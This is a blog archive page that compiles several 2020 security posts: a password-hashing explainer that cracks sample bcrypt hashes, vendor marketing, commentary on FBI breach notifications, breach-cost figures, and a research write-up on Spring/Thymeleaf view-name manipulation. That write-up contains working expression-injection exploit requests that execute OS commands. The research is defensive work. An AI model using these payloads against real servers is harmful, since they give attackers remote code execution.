Daily Archives: September 3, 2020

We Didn’t Encrypt Your Password, We Hashed It. Here’s What That Means:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

You've possibly just found out you're in a data breach. The organisation involved may have contacted you and advised your password was exposed but fortunately, they encrypted it. But you should change it anyway. Huh? Isn't the whole point of encryption that it protects data when exposed to unintended parties? Ah, yes, but it wasn't encrypted it was hashed and therein lies a key difference:

I see this over and over again and I'm not just on some nerdy pedantic rant, the difference between encryption and hashing is fundamental to how at-risk your password is from being recovered and abused after a data breach. I often hear people excusing the mischaracterisation of password storage on the basis of users not understanding what hashing means, but what I'm actually hearing is that breached organisations just aren't able to explain it in a way people understand. So here it is in a single sentence:

A password hash is a representation of your password that can't be reversed, but the original password may still be determined if someone hashes it again and gets the same result.

Let's start to drill deeper in a way that can be understood by everyday normal people, beginning with what a password hash actually is: there are two defining attributes that are relevant to this discussion:

  1. A password hash is one-way: you can hash but you can never un-hash
  2. The hashing procedure is deterministic: you will always get the same output with the same input

This is important for password storage as it means the following as they relate to the previous points:

  1. The original password is never stored thus keeping it a secret even from the website you provided it to
  2. By being deterministic, when the password is hashed at registration it will match the same password provided and hashed at login

Take, for example, the following password:

P@ssw0rd

This is a good password because it has lowercase, uppercase, numeric and non-alphanumeric values plus is 8 characters long. Yet somehow, your human brain looked at it and decided "no, it's not a good password" because what you're seeing is merely character substitution. The hackers have worked this out too which is why arbitrary composition rules on websites are useless. Regardless, here's what the hash of that password looks like:

161ebd7d45089b3446ee4e0d86dbcf92

This hash was created with the MD5 hashing algorithm and is 32 characters long. A shorter password hashed with MD5 is still 32 characters long. This entire blog post hashed with Md5 is still 32 characters long. This helps demonstrate the fundamental difference between hashing and encryption: a hash is a representation of data whilst encryption is protected data. Encryption can be reversed if you have the key which is why it's used for everything from protecting the files on your device to your credit card number if you save it on a website you use to the contents of this page as it's sent over the internet. In each one of these cases, the data being protected needs to be retrieved in its original format at some point in the future hence the need for encryption. That's the fundamental difference with passwords: you never need to retrieve the password you provided to a website at registration, you only need to ensure it matches the one you provide at login hence the use of hashing.

So, where does hashing go wrong and why do websites still ask you to change your password when hashes are exposed? Here's an easy demo - let's just Google the hash from above:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

And here we have a whole bunch of websites that match the original password with the hashed version. This is where the deterministic nature of hashes becomes a weakness rather than a strength because once the hash and the plain text version are matched to each other, you've now got a handy little searchable index. Another way of thinking about this is that password hashes are too predictable, so what do we do? Add randomness, which brings us to salt.

Imagine that if instead of just hashing the word "P@ssw0rd", we added another dozen characters to it first - totally random characters - and then we hashed it. Someone else comes along and uses the same password and they get their own salt (which means their own collection of totally random characters) which gets added to the password then hashed. Even with the same password, when combined with a unique salt the resultant hash will, itself, also be unique. So long as the same salt used at registration is added to your password at login (and yes, this means storing the salt alongside the hash in a database somewhere), the process can be repeated and the website can confirm if the password is correct.

Problem is, if someone has all the data out of a database Wattpad style, can't they just reproduce the salting and hashing process? I mean you've got the salt and the hash sitting right there, what's to stop someone from having a great big list of passwords, picking a salt from the database then adding it to each password, hashing it and seeing if it matches the one from the breach? The only thing hampering this effort is time; how long would it take to hash that big list of passwords for one user's record from the database? How long for, in Wattpad's case, more than a quarter of a billion users? That all depends on the hashing algorithm that's been chosen. Old, antiquated hashing algorithms that were never really designed for password storage in the first place can be calculated at a rate of tens of billions per second on consumer-grade hardware. Yes, that's "billion" with a "b" for bravo and for the more technical folks, that's where you're at with MD5 or SHA-1. How long is a hashed password going to remain uncracked at that rate of guesses? Usually, not very long.

Going back to the example in the tweet at the start of this blog post, Wattpad didn't encrypt their customers' passwords, they hashed them. With bcrypt. This is a hashing algorithm designed for storing passwords and what really sets it apart from the aforementioned ones is that it's slow. I mean really slow, like it takes tens of millions of times longer to create the hash. You don't notice this as a customer when you're registering on the site or logging on because it's still only a fraction of a second to calculate a hash of your password, but for someone attempting to crack your password by hashing different possible examples and comparing them to the one in Wattpad, it makes life way harder. But not impossible...

Let me demonstrate: here's the Wattpad registration page:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

I was interested in what the password criteria was so I entered a single character and was told that it must be at least 6. Righto, let's now check complexity requirements:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

Will 6 all lowercase characters be allowed? Let's submit the registration form and find out:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

Yep 😎

Here's the problem with this and it's all going to bring us back to Wattpad's earlier statement about changing your password: because Wattpad's entire password criteria appears to boil down to "just make sure you have 6 or more characters", people are able to register using passwords like the one above. That particular password - "passwo" - appears in Have I Been Pwned's Pwned Password service 3,649 times:

We Didn't Encrypt Your Password, We Hashed It. Here's What That Means:

It's a very poor password not because of a lack of numbers, uppercase or non-alphanumeric characters (I could easily make a very strong password that's all lowercase), but because of its predictability and prevalence.

Armed with the knowledge that Wattpad allows very simple passwords, I took a small list of the most common ones that were 6 characters or longer and checked them against a sample of their bcrypt hashes. Let's consider a bcrypt hash like this, for example:

$2y$10$5sqOeY.NDcW8vkr47BIG..PeSddwTT/Z8z0MwvF/92NSSh3UsxA.u

The plain text password that generated that hash is "iloveyou". That's in Pwned Passwords 1.6M times and I would argue it's a rather risky one to allow. But because Wattpad's password criteria is so weak, someone (probably many people) used that password and it was easily cracked.

How about this one:

$2y$10$1Gs7jtaGKJjX/7A1GqE2E.0r94/FnKphjp8dyhOVB0jZXirrkfNZW

The plain text version of that one is... wait for it... "wattpad"! These are easy to verify yourself by using an online tool like bcrypt-generator.com that checks a given password against a given hash.

This is why Wattpad recommends changing passwords - because they can be cracked even when using a good password hashing algorithm. They can't be unencrypted because they weren't encrypted in the first place. If they were encrypted and there was genuine concern they may be unencrypted then that would imply a key compromise in which case all passwords would be immediately decrypted.

So there's your human-readable version of what password hashing is. I'll leave you again with the quote from above I'd far prefer to see in disclosure notices and ideally, a link through to this blog post too so people have accurate information they can make informed decisions on:

A password hash is a representation of your password that can't be reversed, but the original password may still be determined if someone hashes it again and gets the same result.

Together, We Block and Tackle to Give You Peace of Mind

As a leader in cybersecurity, we at McAfee understand that every aspect of your digital life has potential weak spots that could make you vulnerable to threats and attacks. By incorporating security into everything you do online, you’re better protected from potential threats. To mount your offense, we’ve enlisted a team of partners that puts your security needs first, seamlessly blending our security with their services so you can live a confident life online. We bring our McAfee security teams together with industry players like PC & smartphone manufacturers, software & operating system developers, and more to make sure we can keep scoring security wins for you.

PC Partners Sweat the Security So You Don’t Have To

When was the last time you worried about security while you were shopping for a new PC? You were probably checking out the specs, price, and making sure it had all the capabilities you needed for working remotely, distance learning, and maybe a little gaming. And that’s all in addition to the day-to-day productivity, banking, and browsing you do. Like a strong defensive line, HP, Dell, Lenovo, and ASUS work closely with us to make sure that your personal data and devices are secure, especially as you spend more time online than ever before. That’s why so many new PCs are preloaded with a free McAfee® LiveSafe trial to provide integrated protection from malware, viruses, and spyware from day 1 with minimal impact on performance.

McAfee protection goes beyond just antivirus. We help you keep apps and Windows up to date and patched against vulnerabilities, block intruders with our firewall, and help you clean up cookies and temporary files to minimize the digital footprint on your PC.

We build our security directly into the devices consumers rely on for everything from remote yoga to distance learning, so that they know they’ll be safer online, regardless of what their new normal looks like.

Our Defense Is More Mobile Than Ever

Part of a good defense is understanding how the game has changed. We recognize that our customers are using multiple devices to connect online these days. In fact, their primary device may not even be a computer. That’s why we work with mobile providers to ensure customers like you have access to our comprehensive multidevice security options. Devices like mobile phones and tablets allow users to access social media, stream content, and even bank on their terms. For that reason, our mobile protection includes features like VPN, so that you can connect any time, any place safely and use your apps securely.

Retail Partners Make Plug and Play Even Easier

Our online and brick & mortar retail partners are also irreplaceable on the field. We understand that shopping for security can be complicated – even intimidating – when faced with a wall of choices. Whether you’re in-store or browsing online, we’ll work together to address your security needs so that your devices and personal data are protected with the solution that works best for you. Many of our retailers offer additional installation and upgrade support so you can have one less thing to worry about.

Software Partners Help Us Mount a Better Defense

Your web browser is more than a shortcut to the best chocolate chip cookie recipe; it connects you to endless content, information, and communication. Equally important is your operating system, the backbone that powers every app you install, every preference you save, and every vacation destination wallpaper that cycles through. We partner closely with web browsers, operating systems, and other software developers to ensure that our opponents can’t find holes in our defense. Everything that seamlessly works in the background stays that way, helping stop threats and intruders dead in their tracks. Whether it’s routine software updates or color-coded icons that help differentiate safe websites from phishing scams, we’re calling safety plays that keep our customers in the game.

Our Security Sets Teams Up for Success

At McAfee, we work tirelessly to do what we do best: blocking the threats you see, and even the ones you don’t. These days your “digital life” blurs the lines between security, identity, and privacy. So, we go into the dark web to hunt down leaked personal info stolen by identity thieves. We include Secure VPN in all our suites to give you privacy online. It’s these capabilities that strengthen both the offense and defense in our starting lineup of security suites like McAfee® Total Protection and McAfee® LiveSafe.

In short, your protection goes from a few reminders to scan your device to a team of experts helping you stay primed for the playoffs. It’s a roster that includes technology and humans solely devoted to staying ahead of the bad guys, from McAfee Advanced Threat Research (ATR) investigating and reporting like to artificial intelligence and machine learning that strengthens with every threat from every device. In fact, in just the first three months of this year, our labs detected over six threats per second!

Cybercriminals may be taking advantage of this current moment, but together, we can ensure our defense holds strong. After all, defense wins championships.

Stay Updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Together, We Block and Tackle to Give You Peace of Mind appeared first on McAfee Blogs.

Gartner Summit: Balance Risk, Trust, and Opportunity in an Uncertain World

In light of the current pandemic, most organizations will be working remotely for the foreseeable future. But the increase in virtual operations has led to a higher volume of cyberattacks.

Now, more than ever, it???s vital that your organization is armed with the industry???s best application security (AppSec) solutions. But how do you build and secure technology in an uncertain world? It???s a balancing act between risk, trust, and opportunity.

Chris Wysopal, Veracode Co-Founder and CTO believes that harmony between risk, trust, and opportunity is recognized when an organization shifts security to the beginning of the software development lifecycle (SDLC). By shifting security left and fully integrating into the developer???s processes, your organization can seize opportunity by deploying new, innovative software faster.

Your organization can also seize opportunity by embracing third-party services and technology. But third-party libraries carry their share of risk, so it???s important to have software composition analysis integrated into your SDLC. Another tip is to ???automate the vendor onboarding process as much as possible??? to allow the business to move faster while maintaining acceptable risk.

The final piece of the puzzle is building trust. You need consumers to trust that the software you???re providing is safe and that customer data will be protected. Veracode Verified is a three-tier program that enables organizations of all sizes to demonstrate how secure their software or services are to buyers. As organizations achieve the steps laid out in each tier of the Veracode Verified program, they receive a seal to post on their webpage.

To learn more about balancing risk, trust, and opportunity in an uncertain world, visit our virtual booth at the Gartner Security and Risk Management Summit. We will be offering product demos, meetings with executives ??? like Chris Wysopal ??? and an opportunity to win a Drinkworks Home Bar by Keurigツョ.

Spring View Manipulation Vulnerability

In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be. Before doing so, lets look at the simplest Spring application that uses Thymeleaf as a templating engine:

Structure:

HelloController.java:

@Controller
public class HelloController {

    @GetMapping("/")
    public String index(Model model) {
        model.addAttribute("message", "happy birthday");
        return "welcome";
    }
}

Due to the use of @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request for the root url ('/'). It does not have any parameters and returns a static string "welcome". Spring framework interprets "welcome" as a View name, and tries to find a file "resources/templates/welcome.html" located in the application resources. If it finds it, it renders the view from the template file and returns to the user. If the Thymeleaf view engine is in use (which is the most popular for Spring), the template may look like this: welcome.html:



Spring Boot Web Thymeleaf Example

Thymeleaf engine also support file layouts. For example, you can specify a fragment in the template by using

and then request only this fragment from the view:

@GetMapping("/main")
public String fragment() {
    return "welcome :: main";
}

Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document.
From a security perspective, there may be a situation when a template name or a fragment are concatenated with untrusted data. For example, with a request parameter:

@GetMapping("/path")
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome"; //template path is tainted
}

@GetMapping("/fragment")
public String fragment(@RequestParam String section) {
    return "welcome :: " + section; //fragment is tainted
}

The first case may contain a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to try to find a separate file upload and create a new template, but that's a different issue.
Luckily for bad guys, before loading the template from the filesystem, Spring ThymeleafView class parses the template name as an expression:

try {
   // By parsing it as a standard expression, we might profit from the expression cache
   fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}");
}

So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection:

Exploit for /path (should be url-encoded)

GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1

exploit image

In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x we can make sure it's executed by thymeleaf no matter what prefixes or suffixes are.

To summarize, whenever untrusted data comes to a view name returned from the controller, it could lead to expression language injection and therefore to Remote Code Execution.

Even more magic

In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case. As described in the documentation, some return types such as void, java.util.Map or org.springframework.ui.Model:
the view name implicitly determined through a RequestToViewNameTranslator
It means that a controller like this:

@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
    log.info("Retrieving " + document);
}

may look absolutely innocent at first glance, it does almost nothing, but since Spring does not know what View name to use, it takes it from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following:

/
 * Translates the request URI of the incoming {@link HttpServletRequest}
 * into the view name based on the configured parameters.
 * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest
 * @see #transformPath
 */
@Override
public String getViewName(HttpServletRequest request) {
    String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH);
    return (this.prefix + transformPath(lookupPath) + this.suffix);
}

So it also become vulnerable as the user controlled data (URI) comes directly to view name and resolved as expression.

Exploit for /doc (should be url-encoded)

GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1

Safe case: ResponseBody

The are also some cases when a controller returns a used-controlled value, but they are not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody:

@GetMapping("/safe/fragment")
@ResponseBody
public String safeFragment(@RequestParam String section) {
    return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return values as body, instead of view name
}

In this case Spring Framework does not interpret it as a view name, but just returns this string in HTTP Response. The same applies to @RestController on a class, as internally it inherits @ResponseBody.

Safe case: A redirect

@GetMapping("/safe/redirect")
public String redirect(@RequestParam String url) {
    return "redirect:" + url; //CWE-601, as we can control the hostname in redirect
}

When the view name is prepended by "redirect:" the logic is also different. In this case, Spring does not use Spring ThymeleafView anymore but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation.

Safe case: Response is already processed

@GetMapping("/safe/doc/{document}")
public void getDocument(@PathParam String document, HttpServletResponse response) {
    log.info("Retrieving " + document)
}

This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse in parameters, Spring considers that it's already processed the HTTP Response, so the view name resolution just does not happen. This check exists in the ServletResponseMethodArgumentResolver class.

Conclusion

Spring is a framework with a bit of magic, it allows developers to write less code but sometimes this magic turns black. It's important to understand situations when user controlled data goes to sensitive variables (such as view names) and prevent them accordingly. Stay safe.

Credits

This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode Authors would like to thank Aleksei Tiurin from Acunetix for the excellent research on SSTI vulnerabilities in Thymeleaf

The FBI Intrusion Notification Program

The FBI intrusion notification program is one of the most important developments in cyber security during the last 15 years. 

This program achieved mainstream recognition on 24 March 2014 when Ellen Nakashima reported on it for the Washington Post in her story U.S. notified 3,000 companies in 2013 about cyberattacks

The story noted the following:

"Federal agents notified more than 3,000 U.S. companies last year that their computer systems had been hacked, White House officials have told industry executives, marking the first time the government has revealed how often it tipped off the private sector to cyberintrusions...

About 2,000 of the notifications were made in person or by phone by the FBI, which has 1,000 people dedicated to cybersecurity investigations among 56 field offices and its headquarters. Some of the notifications were made to the same company for separate intrusions, officials said. Although in-person visits are preferred, resource constraints limit the bureau’s ability to do them all that way, former officials said...

Officials with the Secret Service, an agency of the Department of Homeland Security that investigates financially motivated cybercrimes, said that they notified companies in 590 criminal cases opened last year, officials said. Some cases involved more than one company."

The reason this program is so important is that it shattered the delusion that some executives used to reassure themselves. When the FBI visits your headquarters to tell you that you are compromised, you can't pretend that intrusions are "someone else's problem."

It may be difficult for some readers to appreciate how prevalent this mindset was, from the beginnings of IT to about the year 2010.

I do not know exactly when the FBI began notifying victims, but I believe the mid-2000's is a safe date. I can personally attest to the program around that time.

I was reminded of the importance of this program by Andy Greenberg's new story The FBI Botched Its DNC Hack Warning in 2016—but Says It Won’t Next Time

I strongly disagree with this "botched" characterization. Andy writes:

"[S]omehow this breach [of the Democratic National Committee] had come as a terrible surprise—despite an FBI agent's warning to [IT staffer Yared] Tamene of potential Russian hacking over a series of phone calls that had begun fully nine months earlier.

The FBI agent's warnings had 'never used alarming language,' Tamene would tell the Senate committee, and never reached higher than the DNC's IT director, who dismissed them after a cursory search of the network for signs of foul play."

As with all intrusions, criminal responsibility lies with the intruder. However, I do not see why the FBI is supposed to carry the blame for how this intrusion unfolded. 

According to investigatory documents and this Crowdstrike blog post on their involvement, at least seven months passed from the time the FBI notified the DNC (sometime in September 2015) and when they contacted Crowdstrike (30 April 2016). That is ridiculous. 

If I received a call from the FBI even hinting at a Russian presence in my network, I would be on the phone with a professional incident response firm right after I briefed the CEO about the call.

I'm glad the FBI continues to improve its victim notification procedures, but it doesn't make much of a difference if the individuals running IT and the organization are negligent, either through incompetence or inaction.

Note: Fixed year typo.

What A Threat Analyst Really Thinks of Intelligence

When I was a threat analyst, too long ago for me to actually put in writing, I remember the thrill of discovery at the apex of the boredom of investigation. We all know that meme:

 

And over the years, investigation leads became a little more substantial. It would begin in one of a few ways, but the most common began through an alert as a result of SIEM correlation rules firing. In this situation, we already knew for what we were looking… the SIEM had been configured to alert us on regex matches, X followed by Y, and other common logistics often mis-named as “advanced analytics”. As we became more mature, we would ingest Threat Intelligence feeds from third party sources. Eager and enthusiastic about the hunt, we would voraciously search through a deluge of false alarms (yes, the IPS did find a perimeter attack against Lotus Notes, but we had been using MS Exchange for over 5 years) and false positives (no, that’s not Duqu… just someone who cannot remember their AD credentials).

And the idea that these intelligence sources could spur an entirely new mechanic in the SOC, which we affectionately now refer to as Threat Hunting, was incredibly empowering. It allowed us to move beyond what was already analyzed (and most likely missed) by the SIEM and other security control technologies. True, we had to assume that the threat was already present and that the event had already established a foothold in the organization, but it allowed us to begin discovery at enterprise scale for indicators that perhaps we were compromised. I mean, remember we need to know a problem exists before we can manage it. But again, bad threat data (I once received a list of Windows DLL’s as IoCs in a fairly large campaign) and overly unimportant threat data (another provider listed hashes associated with polymorphic malware) led us down a rabbit hole we were all but too happy to come out from.

So, did all of that threat data guised under the marketing of “Threat Intelligence” really help us uncover threats otherwise acting in the shadows like a thief in the night? Or did it just divert our attentions to activity that was largely uninteresting while the real threats were just another needle in a stack of needles?

In most mature organizations, Threat Intelligence is a critical component to the SecOps strategy. Of course, it is; it must be. How else could you defend against such a copious amount of threats trying to attack from every angle? We have ontological considerations. Which threat actors are targeting my industry vertical or geography? Have I discovered any of the associated campaign indicators? And, most importantly, will my existing controls protect me? None of which could be addressed without a Threat Intelligence capability.

I remember working with a customer who was just beginning to expand their security operations resources, and they were eager and excited to be bringing in Threat Intelligence capabilities. The board was putting pressure on the CISO to increase the scope of accountability for his response organization, and the media was beginning to make mincemeat out of any business which was compromised by threat actors. The pressure was on and the intelligence began to flow in… like a firehose. About a month after it began, we spoke over lunch when he was interrupted at least 3 times for escalations. “What’s going on,” I asked. He told me that he was getting called day and night now about findings for which his team lacked complete context and understanding. Surely, they had more threat data, but if you asked him, that feature did not include “intelligence.”

Threat intelligence is supposed to help you filter the signals from the noise. At some point, without context and understanding, it is likely just more noise.

Consider the Knowledge Hierarchy: Data, Information, Knowledge, and Wisdom.

Intelligence is defined by dictionary.com as “knowledge of an event, circumstance, etc., received or imparted; news; information.” If we think of Threat Intelligence as a form of data feeding your Security Operations with a listing of parts, or atomic elements that in and of themselves serve little in the way of context, the SOC will regularly be forced to be reactive. With millions of indicators being pushed daily in the form of file hashes, names, URLs, IP addresses, domains, and more, this is hardly useful data.

When Data is correlated in the form of context using ontology, such as grouping by specific types of malware, we gain just enough to classify the relationships as information. When we know that certain malware and malware families will exhibit groups of indicators, we can better ready our controls, detection mechanisms, and even incident response efforts and playbooks. But, still, we lack the adequate context to understand if, in general, this malware or family of malware activities will apply to my organization. We still need more context.

So, at this point we form an entire story. It’s nice to know that malware exists and exhibits key behavior, but its even better if we know which threat actors tend to use that malware and in what way. These threat actors, like most businesses, operate in structured projects. Those projects, or campaigns, seek to find an outcome. They are targeting specific types of businesses through industry. At the writing of this article, COVID-19 has created such a dramatic vacuum in the pharmaceuticals industry that there is a race to create the first vaccine. The “winner” of such race would reap incredible financial rewards. So, it stands to reason that APT29 (also known as Cozy Bear) who notoriously hacked the DNC before the US 2016 election, would target pharmaceutical R&D firms. Now, KNOWLEDGE of all of this allows one to deduce that if I were a pharmaceutical R&D company, especially one working on a COVID-19 vaccine, that I should look at how APT29 typically behaves and ask some very important questions: what procedures do they typically follow, which tactics are typically witnessed and in what order/timing, which techniques are executed by which processes, and so on. If I could answer all of these questions, I could be reactive, proactive, and even prescriptive:

  • Ensure exploit prevention rules exist for .lnk drops
  • McAfee Credential Theft Protection enabled to protect LSASS stack
  • Monitor for PSExec activity and correlate to other APT29 indicators
  • Monitor/Block for access to registry run keys
  • et al.

However, it seems the one instrument lacking in this race to context and understanding is predictability. Surely, we can predict with the knowledge we have whether or not we may be targeted; but isn’t it much more difficult to predict what the outcome of such an attack may be? Operationally, you may have heard of dry runs or table-top exercises. These are effective operational activities required by functions such as Business Continuity and Disaster Recovery. But what if you could take the knowledge you gleaned from others in the industry, compiled with the security footprint tied to your environment today, and address the elephant in the room which every CISO brings up at the onset of “Threat Intelligence”…

Will I be protected?

– Every CISO, Ever

This level of context and understanding is what leads to Wisdom. Do not wait until the threat makes landfall in your organization. My grandfather always said, “A smart [knowledgeable] man learns from his own mistakes, but a wise man learns from everyone else’s.” I think that rings true with SecOps and Threat Intelligence as well. Once we are able to correlate what we know about our industry vertical, threat actors, campaigns, and geo- and socio-political factors with our own organization’s ability to detect and prevent threats we will truly be wise. Thanks, Pop!

Wisdom as it relates to anti-threat research is not necessarily new. The Knowledge Hierarchy has been a model in Computer Science since about 1980. What is new, is McAfee’s ability to provide a complete introspective of your stakeholder’s landscape. McAfee has one of the largest Threat Intelligence Data Lakes with over 1 billion collection points; a huge Advanced Threat Research capability responsible for converting data gleaned from the data lake, incident response consultations, and underground investigations into actionable information and knowledge; and one of the largest Cybersecurity pure-play portfolios providing insights into your overall cybersecurity footing. This unique position has led way for the creation of MVISION Insights. MVISION Insights provides context in that we have the knowledge of campaigns and actors potentially targeting your vertical. Then, it can alert you when your existing security control configuration is not tuned to prevent such a threat. It then prescribes for you the appropriate configuration changes required to offer such protection.

MVISION Insights allows an organization to immediately answer the question, “Am I protected?” And, if you are not protected it prescribes for your environment appropriate settings which will defend against threat vectors important to you. This methodology of tying together threat data with context of campaign information and the knowledge of your security control configuration allows MVISION Insights to offer a novel perspective on the effectiveness of your security landscape.

When I think back to all of the investigations that led me down the rabbit hole, I wonder what my days would have been filled with had I such a capability. Certainly, there is an element of “fun” in the discovery. I loved the hunt, but I think having the ability to quickly arm myself with the context and understanding of what I was searching for and why I was searching would have accelerated those moments (read hours or days). I’m excited to discuss and demonstrate how McAfee is using MVISION Insights to turn knowledge into wisdom!

To take MVISION Insights for a spin, check out McAfee’s MVISION Insights Preview.

The post What A Threat Analyst Really Thinks of Intelligence appeared first on McAfee Blogs.

The cost of a data breach in 2020

Organisations spend $3.86 million (about £2.9 million) recovering from security incidents, according to Ponemon Institute’s Cost of a Data Breach Report 2020.

That represents a slight decrease on 2019, which Ponemon’s researchers credit to organisations doing a better job strengthening their cyber defences and incident response capabilities.

The report also notes that 52% of data breaches are caused by cyber attacks, and that malware is the costliest form of attack, with organisations spending $4.52 million (about £3.4 million) on average responding to such incidents.

What activities cost organisations money following a data breach?

The report outlines four activities that cost organisations money as they respond to data breaches:

  • Detection and escalation

These are activities that enable organisations to identify when a breach has occurred.

It covers processes such as forensic and investigative activities, assessment and audit services, crisis management and communications to executives and boards.

  • Lost business

These are activities that attempt to minimise the loss of customers, business disruption and revenue losses.

It can include disruption caused by system downtime, the costs associated with customer churn and reputational loss.

  • Notification

These are activities related to the way organisations notify data subjects, regulators and third parties of the data breach.

For example, organisations will typically email or telephone those affected, assess whether the incident needs to be reported to their regulator (and contact them where relevant) and consult with outside experts.

  • Ex-post response

These are the costs associated with recompensing affected data subjects, and the legal ramifications of the incident.

It includes credit monitoring services for victims, legal expenses, product discounts and regulatory fines.

Mitigating the cost of an attack

The report also highlighted the relationship between the cost of a data breach and the time it takes organisations to contain it. The researchers found that organisations take 280 days on average to detect and respond to an incident. However, those that can complete this process within 200 days save about $1 million (about £750,000).

The best way to do that, according to Ponemon Institute, is to implement automated tools to help detect breaches and suspicious behaviour.

Organisations that used artificial intelligence and analytics had the most success mitigating the costs of data breaches, spending $2.45 million (about £1.84 million) on their recovery process.

By contrast, organisations that didn’t implement such measures spent more than twice that, with an average cost of $6.03 million (about £4.5 million).

This is a lesson that organisations are gradually taking on board. The report found that the proportion of organisations that have implemented measures such as artificial intelligence platforms and automated tools has increased from 15% to 21% in the past two years.

Unfortunately, many organisations don’t know where to begin when implementing and testing defences. That’s where our Cyber Security as a Service can help.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.

The post The cost of a data breach in 2020 appeared first on IT Governance UK Blog.